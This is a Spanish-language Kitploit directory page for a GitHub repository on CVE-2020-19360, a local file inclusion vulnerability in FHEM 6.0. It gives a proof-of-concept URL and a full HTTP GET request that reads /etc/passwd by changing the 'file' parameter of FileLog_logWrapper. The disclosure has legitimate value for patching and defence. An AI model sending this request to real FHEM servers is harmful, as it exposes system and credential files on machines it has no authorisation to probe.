Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability — Local File Inclusion (LFI) en FHEM 6.0 permite a un atacante incluir un archivo, lo que puede conducir a la divulgación de información sensible. | Kitploit
Herramientas/GitHubGitHub/emreovunc/fhem-6.0-local-file-inclusion-lfi-vulnerability
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubemreovunc/fhem-6.0-local-file-inclusion-lfi-vulnerability

FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability

Local File Inclusion (LFI) en FHEM 6.0 permite a un atacante incluir un archivo, lo que puede conducir a la divulgación de información sensible.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
123hace 5 añosAún no revisado

FHEM-6.0-Inclusión-de-Archivos-Locales-LFI-Vulnerabilidad

LFI en FHEM 6.0 permite a un atacante incluir un archivo, lo que puede conducir a la divulgación de información sensible.

CVE-2020-19360

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19360

PoC

Para explotar la vulnerabilidad, alguien podría usar la petición 'http://[HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' para obtener información del objetivo cambiando el parámetro "file".

root@kitploit:~
GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1
Host: 172.16.155.129:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

alt tag

alt tag

Descargar herramienta